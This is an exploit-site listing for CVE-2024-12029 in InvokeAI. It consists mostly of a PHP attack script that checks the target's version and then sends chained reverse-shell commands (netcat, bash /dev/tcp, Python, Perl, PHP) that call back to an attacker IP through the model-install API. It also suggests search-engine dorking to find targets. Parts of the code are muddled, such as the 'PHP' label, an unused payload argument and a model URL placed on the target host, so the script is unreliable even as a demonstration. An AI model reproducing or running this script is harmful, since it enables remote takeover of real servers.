Exploit for InvokeAI 5.0 Code Injection CVE-2024-12029

Name: Exploit for InvokeAI 5.0 Code Injection CVE-2024-12029
Rating: 5 (91 reviews)
2025-03-03 | CVSS 8.0
## https://sploitus.com/exploit?id=PACKETSTORM:189493
=============================================================================================================================================
    | # Title     : InvokeAI v5.0 PHP Code Injection Vulnerability                                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.invoke.com/                                                                                                     |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] The code is a remote command execution (RCE) exploit that targets a vulnerability in InvokeAI, 
    
        which allows an attacker to execute commands via an insecure API that loads and runs models without validating their integrity.
     
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php 127.0.0.1 id
    
    [+] SeT target  = Line : 99
    
    [+] PayLoad :
    
    <?php
    
    class InvokeAIExploit {
        private $target;
        private $port = 9090;
        private $localPort = 8081;
        private $httpDelay = 10;
        private $payload;
    
        public function __construct($target, $payload) {
            $this->target = $target;
            $this->payload = $payload;
        }
    
        private function sendRequest($method, $uri, $headers = [], $data = null) {
            $url = "http://{$this->target}:{$this->port}/$uri";
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
            curl_setopt($ch, CURLOPT_TIMEOUT, 10); // تحديد مهلة الطلب لتجنب الانتظار الطويل
            
            if ($data) {
                curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
            }
            
            $response = curl_exec($ch);
            
            if (curl_errno($ch)) {
                echo "cURL Error: " . curl_error($ch) . "\n";
            }
            
            curl_close($ch);
            return $response;
        }
    
        public function checkVulnerability() {
            echo "[" . date("H:i:s") . "] Checking target...\n";
            
            $response = $this->sendRequest("GET", "api/v1/app/version");
            $json = json_decode($response, true);
    
            if (!$json || !isset($json['version'])) {
                return "Unknown version";
            }
    
            $version = $json['version'];
            if (version_compare($version, "4.0.0", ">=") && version_compare($version, "5.4.2", "<=")) {
                return "Vulnerable version detected: $version";
            }
            return "Safe version: $version";
        }
    
        public function sendPayload() {
        $maliciousModel = "http://{$this->target}:{$this->localPort}/" . bin2hex(random_bytes(4)) . ".ckpt";
    
        // جميع الحمولات الممكنة للاتصال العكسي
        $payloads = [
            "nc -e /bin/sh 192.168.1.100 4444",                      // Netcat
            "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1",          // Bash
            "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.100\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])'", // Python3
            "perl -e 'use Socket;$i=\"192.168.1.100\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&S\");open(STDOUT,\"&S\");open(STDERR,\"&S\");exec(\"/bin/sh -i\");};'", // Perl
            "php -r '\$sock=fsockopen(\"192.168.1.100\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'", // PHP Reverse Shell
        ];
    
        // دمج الحمولات ضمن `source` أو `headers`
        $payloadCommand = implode(" ; ", $payloads);
    
        $headers = [
            "Content-Type: application/json",
            "X-Exploit: {$payloadCommand}" // استغلال إذا كان التطبيق يستخدم الهيدر داخليًا
        ];
    
        $data = [
            "source" => "{$maliciousModel}; {$payloadCommand}",
            "inplace" => "true"
        ];
    
        echo "[+] Sending Reverse Shell Payloads...\n";
        $response = $this->sendRequest("POST", "api/v2/models/install", $headers, $data);
        return $response;
    }
    
    
        public function startExploit() {
            $check = $this->checkVulnerability();
            echo "$check\n";
            
            if (strpos($check, "Vulnerable") === false) {
                die("[" . date("H:i:s") . "] Target is not vulnerable.\n");
            }
    
            $result = $this->sendPayload();
            echo "[" . date("H:i:s") . "] Response: $result\n";
        }
    }
    
    // تنفيذ الاستغلال مع تمرير حمولة "id" لاختبار تنفيذ الأوامر
    $exploit = new InvokeAIExploit("192.168.1.1", "id");
    $exploit->startExploit();
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================